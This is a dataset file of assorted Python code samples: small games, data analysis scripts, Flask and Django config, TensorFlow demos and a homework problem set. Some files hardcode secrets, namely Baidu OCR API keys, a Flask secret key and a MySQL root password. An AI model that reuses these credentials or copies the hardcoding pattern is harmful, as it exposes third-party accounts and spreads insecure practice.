+{"seq_id":"431956592","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nimport codecs\nimport os\n\ntry:\n import re2 as re\nexcept ImportError:\n import re\n\nDATA_DIRECTORY = os.path.join(os.path.dirname(__file__), 'data')\n\ndef to_unicode(obj, encoding='utf-8'):\n if isinstance(obj, basestring):\n if not isinstance(obj, unicode):\n obj = unicode(obj, encoding)\n return obj\n\n\ndef get_mapping(filename):\n try:\n wordfile = codecs.open(os.path.join(DATA_DIRECTORY, filename), 'r',\n encoding='utf-8')\n worddict = {}\n for line in wordfile:\n line = line.strip()\n if line:\n (find, replace) = line.split('=>')\n worddict[find.strip()] = replace.strip()\n return worddict\n except IOError:\n return {}\n\n\ndef multisub(text, filename):\n dictionary = get_mapping('%s.txt' % filename)\n for (find, replace) in dictionary.items():\n pattern = re.compile(r'(?i)\\b%s\\b' % find)\n text = re.sub(pattern, replace, to_unicode(text))\n return text\n","sub_path":"multisub.py","file_name":"multisub.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"198068360","text":"__author__ = 'Tom Van den Eede'\n__copyright__ = 'Copyright 2018-2020, Palette2 Splicer Post Processing Project'\n__credits__ = ['Tom Van den Eede',\n 'Tim Brookman'\n ]\n__license__ = 'GPLv3'\n__maintainer__ = 'Tom Van den Eede'\n__email__ = 'P2PP@pandora.be'\n__status__ = 'BETA'\n\n\n# general version info\nMajorVersion = 4\nMinorVersion = 16\nBuild = 0\n\n\nlatest_stable_version = \"\"\n\nVersion = \"{}.{:02}.{:03}\".format(MajorVersion, MinorVersion, Build)\n\n##################################\n# UPDATE FILES FOR CURRENT VERSION\n##################################\n# zip_file=p2pp_mac.zip\n","sub_path":"version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"326705346","text":"#!/usr/bin/env python3\n#\n# Mitch Torrens (c) 2019\n#\n\n\"\"\"\nA command line blackjack game\n\"\"\"\n\nimport sys\nimport argparse\nimport random\nimport json\n\nfrom collections import namedtuple\nfrom enum import Enum\n\nCard = namedtuple('Card', 'rank suit')\n\nclass Rank(Enum):\n ace = 1\n two = 2\n three = 3\n four = 4\n five = 5\n six = 6\n seven = 7\n eight = 8\n nine = 9\n ten = 10\n jack = 11\n queen = 12\n king = 13\n\nclass Suit(Enum):\n clubs = 1\n diamonds = 2\n hearts = 3\n spades = 4\n\nclass Deck:\n _cards = []\n for s in Suit:\n for r in Rank:\n _cards.append(Card(r, s))\n\n def __init__(self):\n pass\n\n def __iter__(self):\n for card in self._cards:\n yield card\n\nclass Table:\n\n _shoe = []\n\n def __init__(self, num_decks, num_cut_decks):\n self._num_decks = num_decks\n self._num_cut_decks = num_decks\n\n for _ in range(num_decks):\n self._shoe.extend(Deck())\n\n \n\n\nclass Player:\n \n hands = []\n\n def __init__(self, name, bankroll=1000):\n self._name = name\n self._bankroll = bankroll\n\n def __str__(self):\n return \"Player {}, bankroll {}\".format(self._name, self._bankroll)\n\n def bet(self, num_chips):\n if num_chips > self._bankroll:\n num_chips = self._bankroll\n print(\"{} has insufficient funds. Making max bet of {}\".format(self._name, num_chips))\n \n# TODO: Encapsulate this better\ndef display(table, players):\n\n if table.out_format == 'json':\n print(json.dumps(table.__dict__))\n for p in players:\n print(json.dumps(p.__dict__))\n else:\n for p in players:\n print(p)\n\n\ndef play(table, players):\n\n table.deal(players)\n display(table, players)\n\n for p in players:\n pass\n\ndef main(argv=()):\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('num_players', nargs='?', const=1, type=int, choices=range(1,7), \n help='The number of players (default 1)')\n parser.add_argument('-n', type=str, nargs='*', help=\"The names of each player\")\n bankrolls = parser.add_argument('-b', type=int, nargs='*', \n help=\"The starting bankrolls for each player (default 1000 chips)\")\n parser.add_argument('-d', type=int, default=1, choices=range(1,9), \n help=\"The number of 52-card decks used by the dealer (default 1 deck)\")\n parser.add_argument('-c', type=float, \n help=\"\"\"The number of 52-card decks cut out of the shoe, \n prompting the dealer to shuffle (default 1/4 of the deck)\"\"\")\n \n args = parser.parse_args(argv)\n\n if (len(args.b) > 1 and len(args.b) != args.num_players):\n # TODO: Investigate better integrating error into argparse, so that output matches built-in errors\n raise argparse.ArgumentError(bankrolls, \"unexpected number of starting bankroll arguments\")\n\n players = []\n for p in range(args.num_players):\n if p < len(args.n):\n name = args.n[p]\n else:\n name = 'Player {}'.format(p+1)\n if p < len(args.b):\n bankroll = args.b[p]\n else:\n bankroll = args.b[0]\n\n players.append(Player(name, bankroll))\n\n table = Table(args.d, args.c)\n\n #while False:\n play(table, players)\n \n return 0\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","sub_path":"Blackjack/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"87323662","text":"# Dependencies\nimport csv\nimport os\nimport pandas as pd\n\nelection_data = os.path.join(\"Resources/election_data.csv\")\n\ncandidates = []\ntotal_votes = 0\nvote_count = []\npercent_votes = []\n\n\nwith open(election_data) as election_data:\n reader = csv.DictReader(election_data)\n\n for row in reader:\n total_votes = total_votes + 1\n total_candidates = row[\"Candidate\"] \n\n#Add candidates name to list, if not in the list, and add votes. \n\n if row[\"Candidate\"] not in candidates:\n \n candidates.append(row[\"Candidate\"])\n index = candidates.index(row[\"Candidate\"])\n vote_count.append(1)\n\n#If the name exists in the list, add votes to that person's name.\n else:\n index = candidates.index(row[\"Candidate\"])\n vote_count[index] +=1\n\n#Determine the % vote for each Candidate on the list\n for votes in vote_count:\n percentage = (votes/total_votes)\n percentage = \"{:.1%}\".format(percentage)\n percent_votes.append(percentage)\n\n#print(candidates)\n#print(vote_count)\n#print(percent_votes)\n\n#Find the winner\ncandidate_df = {\"Candidate_names\": candidates,\"Votes Per Candidate\":vote_count}\ncandidate_df2=pd.DataFrame(candidate_df)\ncandidate_df3 = candidate_df2.sort_values(\"Votes Per Candidate\", ascending = False)\nwinner = candidate_df3.head(1)\n\n#Print\n#Print Financial Analysis info\nprint(\"Election Results\")\nprint(\"---------------------\")\nprint(f\"Total Votes: {str(total_votes)}\")\nprint(\"---------------------\")\nline1 = \"Election Results\"\nline2 = \"---------------------\"\nline3 = str(f\"Total Votes: {str(total_votes)}\")\nline4 = \"---------------------\"\nline5 = \"\"\nfor x in range (4):\n print(f\"{str(candidates[x])}: {str(percent_votes[x])} ({str((vote_count[x]))})\")\n line5 += str(f\"{str(candidates[x])}: {str(percent_votes[x])} ({str((vote_count[x]))})\\n\")\nline6 = \"---------------------\"\nline7 = str(f\"Winner: {winner['Candidate_names'].values}\")\n\noutput = open(\"output.txt\", \"w\")\noutput.write('{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n'.format(line1,line2,line3,line4,line5,line6,line7))\n\nprint(\"---------------------\")\n#print(f\"Winner: {str(winner)}\")\nprint(f\"Winner: {winner['Candidate_names'].values}\")","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"482890740","text":"#!/usr/bin/env python3\n'''\nTime the update rate\n\nCopyright (C) 2020 Simon D. Levy\n\nMIT License\n'''\n\nimport gym\nfrom time import time\n\nNITER = 10000\n\nif __name__ == '__main__':\n\n # Create and initialize the simplest copter environment (on/off motors)\n env = gym.make('gym_copter:Copter-v0')\n env.reset()\n\n start = time()\n\n # Loop a bunch of times\n for k in range(NITER):\n\n # Run full-throttle\n env.step([1])\n\n del env\n\n print('%d fps' % (int(NITER/(time()-start))))\n","sub_path":"examples/timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"544909635","text":"\n\nfrom xai.brain.wordbase.verbs._expedite import _EXPEDITE\n\n#calss header\nclass _EXPEDITES(_EXPEDITE, ):\n\tdef __init__(self,): \n\t\t_EXPEDITE.__init__(self)\n\t\tself.name = \"EXPEDITES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"expedite\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_expedites.py","file_name":"_expedites.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"121171498","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 22 01:48:06 2018\n\n@author: chengxue\n\"\"\"\nimport active_subspaces as ac\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\n\ndef Original_ActiveSubspace(fun,input_range,training_points,testing_points,number_of_gradient,approximation_dimension):\n\n training_points = training_points[:number_of_gradient]\n f = fun(training_points).reshape(len(training_points),1)\n\n #construct the active subspace\n ss = ac.subspaces.Subspaces()\n df = ac.gradients.finite_difference_gradients(training_points, fun) #here I use finite difference to find the gradient \n ss.compute(df=df)\n #plot the eigvectors\n# ac.utils.plotters.eigenvalues(ss.eigenvals)\n \n #quadratic polynomial approximation\n RS = ac.utils.response_surfaces.PolynomialApproximation(2)\n #Train the surface with active variable values (y = XX.dot(ss.W1)) and function values (f)\n y = training_points.dot(ss.W1)\n RS.train(y, f)\n\n testing_y = testing_points.dot(ss.W1)\n# testing_y = testing_y.reshape(len(testing_y),testing_y.shape[1])\n\n y_estimate = RS.predict(testing_y)[0]\n y_true = (fun(testing_points))\n MSE = mean_squared_error(y_estimate, y_true) \n \n \n# print(\"***********************\")\n# print(\"Original method MSE:\",MSE)\n# print(\"***********************\")\n return MSE","sub_path":"codes/functions used in the thesis/final method/original_method.py","file_name":"original_method.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"230299538","text":"from aip import AipOcr\n\n\"\"\" 你的 APPID AK SK \"\"\"\nAPP_ID = '10723084'\nAPI_KEY = 'l1ddO816pvSukFhHOrfdnty7'\nSECRET_KEY = '54tSUS2u8IHdrpObaVVZXckNmGK0PBAl'\n\nclient = AipOcr(APP_ID, API_KEY, SECRET_KEY)\n\"\"\" 读取图片 \"\"\"\n\n\ndef get_file_content(filePath):\n with open(filePath, 'rb') as fp:\n return fp.read()\n\n\ndef image_orc(url):\n msg = \"\"\n \"\"\" 如果有可选参数 \"\"\"\n options = {\"detect_direction\": \"true\", \"detect_language\": \"false\"}\n \"\"\" 带参数调用网络图片文字识别, 图片参数为远程url图片 \"\"\"\n info = client.webImageUrl(url, options)\n if \"words_result_num\" in info and info[\"words_result_num\"] > 0:\n for text in info[\"words_result\"]:\n msg = text + \"\\n\"\n print(msg)\n return msg\n else:\n return \"识别错误\"\n\n\nif __name__ == '__main__':\n url = \"http://p1.gexing.com/G1/M00/FB/F2/rBACFFI7yr_yD7a9AABZATC8j00783.jpg\"\n image_orc(url)\n","sub_path":"AipOcr.py","file_name":"AipOcr.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"314995465","text":"import time\nimport pandas as pd\nimport numpy as np\n\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # TO DO: get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True:\n print('\\nPlease choose one of the following cities to analyze by typing the full city name\\n')\n city = input('Chicago, New York City, Washington: ').lower()\n print('\\nYou have requested: ',city.capitalize())\n if city not in ('chicago', 'new york city', 'washington'):\n print('\\nWARNING: This is not an appropriate choice, please choose again.\\n\\n')\n else:\n break\n # TO DO: get user input for month (all, january, february, ... , june)\n print('\\nPlease choose a month to filter, or type in \"all\" for all months\\n')\n while True:\n month = input('January, February, March, April, May, June, or all: ').lower()\n print('\\nYou have requested: ',month.capitalize())\n if month not in ('january','february','march','april','may','june','all'):\n print('\\nWARNING: This is not an appropriate month/filter, please choose again.\\n\\n')\n else:\n break\n # TO DO: get user input for day of week (all, monday, tuesday, ... sunday)\n print('\\nPlease choose a day to filter or \"all\" for no filters\\n')\n while True:\n day = input('Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, Sunday, All: ').lower()\n print('\\nYou have requested: ',day.capitalize())\n if day not in ('monday','tuesday','wednesday','thursday','friday','saturday','sunday','all'):\n print('\\nWARNING: This is not an appropriate day/filter, please choose again.\\n\\n')\n else:\n break\n input('\\nPress Enter to Start the various calculations...')\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1\n\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n input('\\nPress Enter to display The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n \n # TO DO: display the most common month\n common_month = df['month'].mode()[0]\n print('The most Common Month was: ', common_month)\n \n\n # TO DO: display the most common day of week\n common_day = df['day_of_week'].mode()[0]\n print('The most Common Day was: ', common_day)\n\n # TO DO: display the most common start hour\n df['hour'] = df['Start Time'].dt.hour\n common_hour = df['hour'].mode()[0]\n print('The most Common Hour was: ',common_hour)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n input('\\nPress Enter to display The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # TO DO: display most commonly used start station\n common_start_station = df['Start Station'].value_counts().idxmax()\n print('The most commonly used start station was: ',common_start_station)\n\n # TO DO: display most commonly used end station\n common_end_station = df['End Station'].value_counts().idxmax()\n print('The most commonly used end station was: ',common_end_station)\n\n # TO DO: display most frequent combination of start station and end station trip\n Combo_Start_stop_station = df.groupby(['Start Station', 'End Station']).count()\n print('The most commonly used combination of Start and End Station was: ', common_start_station, \" & \", common_end_station)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n input('\\nPress Enter to display Trip Duration...\\n')\n start_time = time.time()\n\n # TO DO: display total travel time\n Total_Travel_Time = sum(df['Trip Duration'])\n print('Total Travel Time: ',round(Total_Travel_Time/86400,2),\" Days\")\n\n # TO DO: display mean travel time\n Mean_Travel_Time = df['Trip Duration'].mean()\n print('The Mean travel time is: ', round(Mean_Travel_Time/60,2), \" Minutes\")\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n input('\\nPress Enter to display User Stats...\\n')\n start_time = time.time()\n\n # TO DO: Display counts of user types\n user_types = df['User Type'].value_counts()\n print('Count of User Types: ', user_types)\n\n # TO DO: Display counts of gender\n try:\n gender_type = df['Gender'].value_counts()\n print('\\nGender Types:\\n', gender_type)\n except KeyError:\n print('\\nGender Types: SORRY, this data was not available based on your requested filters')\n \n\n # TO DO: Display earliest, most recent, and most common year of birth\n try:\n Earliest_Year = df['Birth Year'].min()\n print('\\nEarliest Year of Birth: ', round(Earliest_Year,0))\n except KeyError:\n print('\\nEarliest Year of Birth: SORRY, this data was not available based on your requested filters')\n \n try:\n Most_Recent_Year = df['Birth Year'].max()\n print('\\nMost Recent Year of Birth: ', round(Most_Recent_Year,0))\n except KeyError:\n print('\\nMost Recent Year of Birth: SORRY, this data was not available based on your requested filters')\n \n try:\n Most_Common_Year = df['Birth Year'].value_counts().idxmax()\n print('\\nMost Common Year of Birth: ', round(Most_Common_Year,0))\n except KeyError:\n print('\\nMost Common Year of Birth: SORRY, this data was not available based on your requested filters')\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef get_raw_data(df):\n \"\"\" This function is created to display upon request by the user in this manner: \n Script should prompt the user if they want to see 5 lines of raw data.\n If the answer is \"Yes\", continue this prompt and display the raw data until the user says \"No\"\n \"\"\"\n start_row = 0\n end_row = 5\n \n Show_5 = input('Would you like to see 5 lines of raw data? (Y/N): ').lower() \n if Show_5.lower() =='y':\n while True:\n print(df.iloc[start_row:end_row,:])\n start_row += 5\n end_row += 5\n Stop_5 = input('\\nWould you like to see 5 more? (Y/N): ').lower()\n if Stop_5.lower() == 'n':\n break\n else:\n continue\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n get_raw_data(df)\n\n restart = input('\\nWould you like to restart? Enter \"yes\" or \"no\": ')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":8721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"594210406","text":"import os\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nfrom flask_moment import Moment\nfrom flask_mail import Mail\nfrom flask_debugtoolbar import DebugToolbarExtension\n\napp=Flask(__name__)\n\nmoment = Moment(app)\n\napp.config['SECRET_KEY']='\\x00\\xe9\\xab\\xe7n\\xb9\\x03.0\\xa3\\xae\\x92\\x10>\\xbf\\x7f\\x16\\x8b;X9\\xf1\\xfd\\xd2\\x88\\x97\\xfa\\x993j'\napp.config['SQLALCHEMY_DATABASE_URI']='mysql+pymysql://root:tokelee@localhost:3306/todo'\napp.config['SQLALCHEMY_ECHO']=True\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS']=False\napp.debug = True\n#mail--configuration\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USE_TLS'] = True\napp.config['MAIL_USE_SSL'] = False\napp.config['MAIL_USERNAME'] = os.environ.get('MAIL_USERNAME')\napp.config['MAIL_USERNAME'] = os.environ.get('MAIL_PASSWORD')\n\n\ndb=SQLAlchemy(app)\nmail = Mail(app)\ntoolbar=DebugToolbarExtension(app)\n\n\nlogin_manager=LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view='login'\n\nfrom todo import route","sub_path":"todo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"112823833","text":"from geonode.maps.models import Map, Layer, MapLayer, Contact, ContactRole, Role\nfrom django.contrib import admin\n\nclass MapLayerInline(admin.TabularInline):\n model = MapLayer\n\nclass ContactRoleInline(admin.TabularInline):\n model = ContactRole\n\nclass ContactRoleAdmin(admin.ModelAdmin):\n model = ContactRole\n list_display_links = ('id',)\n list_display = ('id','contact', 'layer', 'role')\n list_editable = ('contact', 'layer', 'role')\n\nclass MapAdmin(admin.ModelAdmin):\n inlines = [MapLayerInline,]\n\nclass ContactAdmin(admin.ModelAdmin):\n inlines = [ContactRoleInline]\n\nclass LayerAdmin(admin.ModelAdmin):\n list_display = ('id', 'typename','service_type','title', 'date', 'topic_category')\n list_display_links = ('id',)\n list_editable = ('title', 'topic_category')\n list_filter = ('date', 'date_type', 'constraints_use', 'topic_category')\n filter_horizontal = ('contacts',)\n date_hierarchy = 'date'\n readonly_fields = ('uuid', 'typename', 'workspace') \n inlines = [ContactRoleInline]\n\nadmin.site.register(Map, MapAdmin)\nadmin.site.register(Contact, ContactAdmin)\nadmin.site.register(Layer, LayerAdmin)\nadmin.site.register(ContactRole, ContactRoleAdmin)\nadmin.site.register(MapLayer)\nadmin.site.register(Role)\n","sub_path":"src/GeoNodePy/geonode/maps/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"97395605","text":"import concurrent.futures\nfrom typing import Optional, Type, MutableSet, Union, Iterable, Set\n\nfrom abc import ABCMeta, abstractmethod\nfrom operator import methodcaller\n\nfrom dss.index.bundle import Bundle, Tombstone\nfrom dss.util.types import LambdaContext\n\n\nclass IndexBackend(metaclass=ABCMeta):\n \"\"\"\n An abstract class defining the interface between the data store and a particular document database for the\n purpose of indexing and querying metadata associated with bundles and the files contained in them.\n \"\"\"\n def __init__(self, context: LambdaContext, dryrun: bool = False, notify: Optional[bool] = True) -> None:\n \"\"\"\n Create a new index backend.\n\n :param dryrun: if True, log only, don't make any modifications to the index\n\n :param notify: False: never notify\n None: notify on changes\n True: always notify\n \"\"\"\n self.dryrun = dryrun\n self.notify = notify\n self.context = context\n\n @abstractmethod\n def index_bundle(self, bundle: Bundle):\n \"\"\"\n Update the index with the data from the specified bundle.\n \"\"\"\n raise NotImplementedError()\n\n @abstractmethod\n def remove_bundle(self, bundle: Bundle, tombstone: Tombstone):\n \"\"\"\n Remove a given bundle's data from the index, optionally replacing it with that from the specified tombstone.\n \"\"\"\n raise NotImplementedError()\n\n def __repr__(self) -> str:\n return f\"{type(self).__name__}(dryrun={self.dryrun}, notify={self.notify})\"\n\n\nclass CompositeIndexBackend(IndexBackend):\n \"\"\"\n An index backend that delegates to multiple underlying backends, concurrently so where applicable.\n \"\"\"\n def __init__(self,\n executor: concurrent.futures.ThreadPoolExecutor,\n backends: Iterable[Union[IndexBackend, Type[IndexBackend]]],\n timeout=None,\n *args, **kwargs) -> None:\n \"\"\"\n :param executor: the executor to be used for delegating operations to all underlying backends in parallel\n\n :param backends: the backends to delegate to. Can be a mix of backend classes and instances. Any class will be\n instantiated with args and kwargs, an instance will be used as is.\n\n :param timeout: see :py:meth:`.timeout`\n\n :param args: arguments for the constructor of the super class and any backend classes in `backends` (or all\n registered backend classes if `backends` is None).\n\n :param kwargs: keyword arguments for the same purpose as `args`\n \"\"\"\n super().__init__(*args, **kwargs)\n self._timeout = timeout\n self._executor = executor\n\n def make_backend(backend: Union[IndexBackend, Type[IndexBackend]]) -> IndexBackend:\n if isinstance(backend, IndexBackend):\n return backend\n elif issubclass(backend, IndexBackend):\n return backend(*args, **kwargs)\n else:\n raise ValueError(f\"Not an instance or subclass of {IndexBackend.__name__}\")\n\n self._backends = set(map(make_backend, backends))\n\n @property\n def timeout(self):\n \"\"\"\n The time in which concurrently executed operations have to be completed by all underlying backends. If a\n backend operation does not complete within the specified timeout, an exception will be raised. A value of\n None disables the timeout, potentially causing the calling thread to block forever.\n \"\"\"\n return self._timeout\n\n @timeout.setter\n def timeout(self, timeout):\n \"\"\"\n Modify the timeout for the next backend operation.\n \"\"\"\n assert timeout is None or timeout > 0\n self._timeout = timeout\n\n def index_bundle(self, *args, **kwargs):\n self._delegate(self.index_bundle, args, kwargs)\n\n def remove_bundle(self, *args, **kwargs):\n self._delegate(self.remove_bundle, args, kwargs)\n\n def _delegate(self, method, args, kwargs):\n timeout = self._timeout # defensive copy\n fn = methodcaller(method.__name__, *args, **kwargs)\n future_to_backend = {self._executor.submit(fn, backend): backend\n for backend in self._backends}\n done, not_done = concurrent.futures.wait(future_to_backend.keys(), timeout=timeout)\n results = {}\n problems = []\n for future in not_done:\n backend = future_to_backend[future]\n problems.append(f\"Backend {backend} timed out\")\n for future in done:\n exception = future.exception()\n backend = future_to_backend[future]\n if exception is None:\n results[backend] = future.result()\n else:\n problems.append(f\"Backend {backend} raised an exception: {exception}\")\n if problems:\n raise RuntimeError(f\"One or more backends failed: {problems}\")\n return results\n","sub_path":"dss/index/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"400076464","text":"import tensorflow as tf\n\n\ndef saveDemo():\n x1 = tf.placeholder(dtype=tf.float32,shape=[],name='x1')\n x2 = tf.placeholder(dtype=tf.float32,shape=[],name='x1')\n w = tf.Variable(tf.constant(2.),name='W')\n w2 = tf.Variable(tf.constant(2.), name='W')\n ytmp = tf.multiply(w,x1,name='ytemp')\n y = tf.add(ytmp,x2,name='y')\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n ypred = sess.run(y,feed_dict={x1:1,x2:2})\n saver = tf.train.Saver()\n saver.save(sess,'test/model')\n\ndef import_graph():\n sess = tf.Session()\n saver = tf.train.import_meta_graph('test/model.meta')\n saver.restore(sess,'test/model')\n graph = tf.get_default_graph()\n print(tf.global_variables())\n\n\nif __name__ == '__main__':\n # saveDemo()\n import_graph()\n","sub_path":"tensorflow/saveGraph.py","file_name":"saveGraph.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"555828072","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 21 21:05:46 2017\n\n@author: CHEN Anhua\n\"\"\"\n#import numpy as np\nimport calculator as cal\nimport box\nimport random\n\n\n# prob1\nprob1 = lambda my_list: [min(my_list), max(my_list), sum(my_list)/len(my_list)]\n\n# prob2\n#numbers\n\nnumbers = 3\nnumbers2 = numbers\nnumbers2 += 1\nif numbers == numbers2:\n print(\"numbers:\", \" mutable\")\nelse:\n print(\"numbers:\", \" immutable\")\n\n#strings\nstrings = \"uchicago\"\nstrings2 = strings\nstrings2 += 'a'\nif strings == strings2:\n print(\"strings:\", \" mutable\")\nelse:\n print(\"strings:\", \" immutable\")\n\n#lists\nlists = [1,2,3]\nlists2 = lists\nlists2.append(1)\nif lists == lists2:\n print(\"lists:\", \" mutable\")\nelse:\n print(\"lists:\", \" immutable\")\n\n\n#tuples\ntuples = (1, 2, 4)\ntuples2 = tuples\ntuples2 += (1,)\nif tuples == tuples2:\n print(\"tuples:\", \" mutable\")\nelse:\n print(\"tuples:\", \" immutable\")\n\n# dictionaries\ndictionary = {1: \"b\", 2: \"x\"}\ndictionary2 = dictionary\ndictionary2[1] = 'a'\nif dictionary == dictionary:\n print(\"dictionary:\", \" mutable\")\nelse:\n print(\"dictionary:\", \" immutable\")\n\n\n# prob3\n# the calculator.py is stored in the same directory\ndef newfunc(a, b):\n result = cal.sqrtcal(cal.sumcal(cal.productcal(a,a), cal.productcal(b,b)))\n return result\nprint(newfunc(3, 4))\n\n\n#prob4\n\n# shut the box game\n# -*- coding: utf-8 -*-\n\"\"\"\nScript for shut the box game\n\"\"\"\n\nimport random\nimport box as box\nimport sys\n\n# We firstly print the name of the player\nif len(sys.argv) != 2:\n player_name = input(\"Please enter your name: \")\nelse:\n player_name = ''.join(sys.argv[1:])\n\n# set some initial parameters\nremaining_list = list(range(1,10))\nstopper = True\n\nwhile stopper:\n print(\"\\nNumbers left: \", remaining_list) # prinitng the remaining list\n # generate the dice roll\n if (sum(remaining_list) > 6):\n roll = random.choice(list(range(2, 13))) # generate a random 2-dice roll\n else:\n roll = random.choice(list(range(1, 7))) # generate a random 1-dice roll\n print(\"Roll: \", roll)\n stopper = box.isvalid(roll, remaining_list)\n if stopper:\n player_input = input(\"Numbers to eliminate: \")\n elimination = box.parse_input(player_input, remaining_list)\n while not elimination or sum(elimination) != roll:\n print(\"Invalid output!\")\n player_input = input(\"Numbers to eliminate: \")\n elimination = box.parse_input(player_input, remaining_list)\n remaining_list = [n for n in remaining_list if n not in elimination]\n #stopper = box.isvalid(roll, remaining_list)\n else:\n print(\"Game over!\")\n#print(\"Game over!\")\nscore = sum(remaining_list)\nprint(\"\\n Score for \", player_name, \": \", score)\nif score == 0:\n print(\"Congrats! You shut the box!\")\n","sub_path":"probsets/computation/probset1/StandardLibraryProbset.py","file_name":"StandardLibraryProbset.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
